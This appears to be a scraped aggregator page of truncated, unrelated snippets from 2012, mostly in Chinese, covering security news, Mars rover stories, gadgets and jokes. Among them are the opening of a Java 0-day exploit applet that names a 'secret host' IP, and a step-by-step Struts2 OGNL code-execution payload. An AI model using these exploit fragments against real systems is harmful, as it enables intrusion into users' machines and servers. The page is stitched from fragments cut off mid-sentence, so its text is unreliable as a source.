On late Sunday night, the Metasploit Exploit team was looking for kicks, and heard the word on the street that someone was passing around a reliable Java 0-day exploit. Big thanks to Joshua J. Drake (jduck), we got our hands on that PoC, and then once again, started our voodoo ritual. Within a couple of hours, we have a working exploit. Download Metasploit here, and apply the latest update to

捕获到最新的Java 0day漏洞。该漏洞影响浏览器的JRE[1.7.x]插件，危害巨大；攻击者可利用该漏洞进行挂马攻击，进而控制网民用户的计

// // CVE-2012-XXXX Java 0day // // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html // // secret host / ip : ok.aa24.net / 59.120.154.62 // // regurgitated by jduck // // probably a metasploit module soon... // package cve2012xxxx; import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class Gondvv extends Applet { public Gondvv() { } public void disableSecurity() throws Throwable { Statement localStatement =

美国Oval Elephant近日推出了一款只有U盘大小的迷你电脑。这款产品的外观与一个U盘无异，只是USB接口换成了HDMI。产品可以直接通

简要描述： 天天看wooyun上piapiapia弹窗弹的好欢乐，但是真正利用的没几个，也导致了一些人，一些厂商，一些白帽子对XSS危害的蔑视

很久很久以前剑心大叔叫我写过这样一篇文章，当时还没放假，就没去搭理他，嘿嘿。最近，小E又来找我写关于支付漏洞的文章，好吧，写就写了，趁暑假还

21世纪以来，一直是我最喜欢的作品。 - 冠华 艺术家：Theo Jansen 作品：沙滩怪兽 时间：1990年至今 自1990年开始，Jansen投身于创造一种新

Theo Jansen's Strandbeests 泰奥杨森的风能怪物机器人 Theo Jansen's Strandbeests - BBC Theo Jansen creates new creatures 视频:theo jansen创造的新物种(中文字幕) Theo Jansen's Strandbeests 官方网站：http://www.s

深入解读：上坡如吃屎下坡如拉稀 卧槽，太他妈的牛逼了，笑惨了…… 恶趣味 + 低趣味 = 太有才了 太有神韵，太幽默了…… [点此查看更多评论] 留言评论（旧

被试者通过BCI单元基本上泄漏了重要信息，使得计算他们的地址或者银行账户信息变得相对容易很多。 凤凰科技讯 北京时间8月24日消息，国外媒体报道

是的，我们的标题没有开玩笑，这确实是一款核动力的手表，而且它不是什么实验室概念作品，它已经上市，到处都可以买到。手表的名字简单易懂，就叫Nu

硬盘里面有个程序看看 不知道是不是最新的 套着看吧 Author:mOon Blog:www.moonhack.org upload_filemgr_dir.php <?php if(empty($dirname) or $dirname=='uploads/') { $dirname = 'uploads/'; $dirhigh = 'javascript:;'; $dirtext = '上传根目录'; } else { $dirarr = explode('/', $dirname); $curnum = count($dirarr)-2; $dirhigh = '?mode=dir&dirname='; $dirtext = '返回上一层';

安全专家最近确认了一种新型病毒Shamoon将会席卷Windows平台PC，像Flame病毒类似，它能够直接将感染用户电脑内的数据发送到网络

众所周知web安全狗是国内比较流氓的软件，劫持模块，坑爹的删不了。除了这些流氓行为之外，还恬不知耻的做了各种没有用的限制！比如说注入安全狗本

apache struts2 remote code execute, Aug 21 2012 01:54 PM. this method was published at xcon2012 xcon.xfocus.net. kxlzx http://www.inbreak.net flow this and step by step: 1, down load struts2-showcase from struts.apache.org 2, run struts2-showcase. 3, open url: http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRIN G-DEV 4, write skill name to %{expr} for example: %{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.Metho dAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts 2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println( 'hacked by kxlzx'),#hackedbykxlzx.close())} 5, submit and all will done. this method: public static String translateVariables(String expression, ValueStack stack) { return

小提示：您可以使用谷歌翻译阅读中文版。 I mentioned it on twitter a few days ago, I found a flaw in iOS that I consider to be severe, while it does not involve code execution. I am pretty confident that other security researchers already know about this hole, and I fear some pirates as well. The flaw exists

警告：禁止利用文中提到的内容、原理发布任何漏洞利用工具，后果自负。 （国内骗子都那么多了，大家都积点德吧） 漏洞简介： 4天前Pod2g发文Nev

8月22日讯 据山东广播电视台公共频道《民生直通车》报道，网购是你先把钱打来，我再发货，钱打来了，发不发货就是我的事了，想怎么骗你，就怎么骗你

本报讯 据英国《每日邮报》21日报道,全球第一款利用3D打印技术“打印”出来的比基尼泳衣已经开始在网上出售。这款名为“尼龙12”的比基尼泳衣由

这个”总浏览数“只是统计的所有文章点击数，不包括：已删文章、主页、列表、所有留言页面等，所以实际浏览数早已远远超过这个数了…… 2012-02-25 本站总浏览数

为什么呢？ forkintheroad 2012-08-13 15:21:02 【惊！好奇号被火星虫子消灭】 据好奇号在升级过程中发来的反馈显示，他们在火星发现某种昆虫，NASA的科学家收到的信息如下“Th

好奇号的 Rover Compute Element 包含两套相同的计算机系统，一个发生故障后另一个会自动配置接管，它包含 256K EEPROM，256MB 内存，2GB 闪存，抗辐射处理器是

智能手机爱好者们想必都很熟悉“刷机”这件事，而当你还在为选择固件而犹豫不决时，NASA的工程师却已经开始进行一次跨星球刷机行动：为远在2.5

“好奇号”登陆火星已经超过一周了，自登陆以来它只进行了设备检修和拍照工作，还没迈出自己在火星上的第一步。我们已经看到了它为我们拍摄的登陆点3

demo地址：http://tmxk.org/jother/ 是js的基本原理，用匿名函数的原生形式 []['sort']['construct

就在小米2发布的当天，奇虎360的综合搜索低调亮相。 上线5天，360搜索就超越搜狗等老牌搜索引擎，一跃成为仅次于百度的中国第二大搜索引擎。创

江西警察学院官网上一度出现众多招嫖信息 新闻源：江西警察学院招生就业处网站近日被曝出现近万条招嫖信息。昨日，校方回应称，出现此种现象系不法分子

中关村在线消息：据海外媒体报道，韩国蔚山国家科学技术学院近日研发出一项新技术，该技术将大幅降低充电电池的充电时间。如果该产品成功推向市场，未

摘要： 金山移动安全中心刚刚截获到一款新型手机病毒，此病毒危害相当大，它不仅能够监听用户短信，消耗用户大量手机费，同时它还会重点监听带有“卡号

前些天，因某些业务需要，需开发一个与百度相关的程序，其中一个子功能便是：百度账号批量登陆、并保持在线状态。 花了些时间研究了一番，当时写了点分